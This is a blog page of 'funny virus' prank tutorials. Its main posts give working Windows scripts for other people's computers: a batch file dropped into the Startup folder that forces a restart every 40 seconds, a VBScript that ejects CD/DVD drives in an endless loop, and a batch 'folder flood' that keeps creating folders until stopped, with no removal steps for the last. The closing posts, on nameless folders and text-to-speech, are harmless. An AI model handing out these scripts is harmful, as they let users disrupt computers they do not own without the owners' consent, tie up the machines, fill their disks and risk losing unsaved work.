Search This Blog

Pages

Header Ads Widget

Responsive Advertisement
Showing posts with label funny virus. Show all posts
Showing posts with label funny virus. Show all posts

Friday, 18 August 2017

Prank on friends: Restart their computer continously......

Hello guys
This trick will help to prank on your friends...
Simply paste this coding in notepad and save this as *.bat (ex: shut.bat).
...................................................................................................
@echo     off
echo message here
shutdown /r /t 40 /c "HAVE FUN"
....................................................................................................

 And the last step paste this file in following directory:-
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"


Now your freinds computer will restart every time in span of  40 seconds.

ANTIDOTE:
Simply save this line in notepad as antidote.bat
..........................................
shutdown /a
..........................................
Then after restart, fastly click this file to abort one time restart
And then delete this file from startup folder or given directory
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

WARNING:
Antidote file should be placed on desktop for quick action.
Try this trick at your own responsibility, this blog is not liable for any action caused by this trick.
For any help mail us or leave comment.

Like and Share if u enjoy it.....😎😎                    













Thursday, 21 August 2014

How to create a funny virus that continiously eject cd/dvd drives

This trick will create a code which will continuously eject CD/DVD drives. If you put them back in, it will pop them out again untill u don't know how to stop it( explained blow the code " how to stop it" ). Copy this code and paste it in Notepad


Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
and save it as cdrom.vbs or *.vbs

Double click to open this file and you will be impressed by this awesome trick.

How to stop it
  • Open task manager or use  ctrl+alt+del
  • click on process tab
  • select wscript.exe
  • click on end process.
enjoy.........




And please like and follow us.......

How to create folder floood .............

1. OPen notepad and paste the code below ....

                :start
                 md %random%
                 goto start

2. save it as *.bat extension.....
You have done .....

Monday, 18 August 2014

How to create folder without any name

It is very simple
1. Just create a new folder.
2. Right click on it and press rename button....
3. then press alt+0160.
4. Simple press enter and u have done....

Friday, 15 August 2014

How to make your computer speak

1. Just simply open notepad and paste the below code......
           Dim Message, Speak
          Message=InputBox("Enter text","Speak")
          Set Speak=CreateObject("sapi.spvoice")
          Speak.Speak Message

2. Save the above file as *.vbs file .......